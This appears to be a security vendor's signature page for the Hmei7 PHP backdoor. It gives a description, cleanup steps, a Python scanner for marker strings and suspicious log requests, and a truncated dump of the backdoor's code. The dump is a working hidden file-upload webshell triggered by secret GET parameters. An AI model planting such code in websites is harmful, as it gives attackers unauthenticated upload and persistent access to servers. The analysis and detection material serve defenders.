Malware Signatures


php.backdoor.hmei7.001

Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of these malicious files are as simple as a single line of code that allows remote code execution; others are complex, providing different functions to the attacker.

Hmei7 is a well-known Indonesian defacer (or group) that also adds a signature to its hacking tools. These are usually backdoors with a file-upload feature and the ability to change vital site files such as index.php or configuration.php. This lets the attacker quickly modify the site's appearance and deface it.

Affecting

Any PHP-based website (often through outdated WordPress, Joomla, osCommerce, Magento or Drupal installations, or stolen passwords).

Cleanup

Cleanup is done by deleting the malicious file, which you can find by searching your files for the dump code below. Reviewing access logs for unexpected HTTP POSTs can point to the possibly infected files.
You can also sign up with us and let our team remove the malware for you.
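
One way to carry out both cleanup checks, as an added example that is not part of the original page: it searches a directory tree for literal strings copied from the dump on this page and flags access-log requests that carry the dump's trigger parameters or POST to an endpoint outside an allowlist. The allowlist, the sample log lines and the function names are assumptions made for the example.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit, parse_qs

# Literal strings copied from the dump on this page.
MARKERS = ["7iemH yb dekcah", "$_GET['indonesia']", "$_GET['yaiyalah']"]
TRIGGER_PARAMS = ("indonesia", "yaiyalah")
# Assumption: the only endpoints on this site that legitimately receive POSTs.
EXPECTED_POST = {"/wp-login.php", "/wp-comments-post.php"}
# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, made-up paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /uploads/cache.php?indonesia HTTP/1.1" 200 300',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "POST /uploads/cache.php?indonesia HTTP/1.1" 200 330',
    '203.0.113.7 - - [01/Jan/2024:10:01:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "POST /tmp/up.php HTTP/1.1" 200 12',
]

def scan_tree(root):
    """Map each file under root that contains a marker to the markers found."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            # latin-1 decodes any byte sequence, so binary files cannot raise
            text = path.read_bytes().decode("latin-1")
            found = [m for m in MARKERS if m in text]
            if found:
                hits[str(path)] = found
    return hits

def suspicious_requests(log_lines, expected_post=EXPECTED_POST):
    """Return (method, path, reason) for requests that deserve a closer look."""
    flagged = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # keep_blank_values so a bare "?indonesia" still counts as a parameter
        params = parse_qs(url.query, keep_blank_values=True)
        if any(p in params for p in TRIGGER_PARAMS):
            flagged.append((m["method"], url.path, "trigger parameter"))
        elif m["method"] == "POST" and url.path not in expected_post:
            flagged.append((m["method"], url.path, "unexpected POST"))
    return flagged
```

Call `scan_tree()` with the web root and `suspicious_requests()` with the lines of the server's access log. The marker strings and parameter names are easily changed between variants, so an empty result does not by itself show that the site is clean.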

Dump

Part of a malicious script with the (reversed) Hmei7 signature:

if ( isset($_GET['indonesia']) )
{
    echo "silahkan masuk\n\n";
    echo '<b>Indonesian people is here..<br><br>'.''.'<br></b>';
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( $_POST['_upl'] == "Upload" ) {
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
        else { echo '<b>Upload Gagal !!!</b><br><br>'; }
    }
exit;
}
if ( isset($_GET['yaiyalah']) )
{
    $tmp=strrev('7iemH yb dekcah');
    $nama='x.txt';